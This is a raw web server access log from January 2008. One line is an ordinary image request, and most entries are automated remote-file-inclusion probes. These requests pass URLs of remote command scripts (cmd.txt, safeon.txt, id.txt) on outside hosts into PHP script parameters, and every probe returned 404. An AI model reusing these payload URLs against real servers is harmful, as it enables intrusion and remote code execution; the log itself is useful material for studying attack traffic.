68.35.189.41 - - [22/Jan/2008:11:50:20 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:11:50:31 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:11:50:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:11:50:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:50:40 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:50:41 -0800] "GET //modules/xfsection/modify.php?dir_module=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:50:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:50:44 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:11:53:19 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:11:53:20 -0800] "GET //convert/mvcw.php?step=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:11:53:21 -0800] "GET /logs//convert/mvcw.php?step=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:11:53:22 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:54:04 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
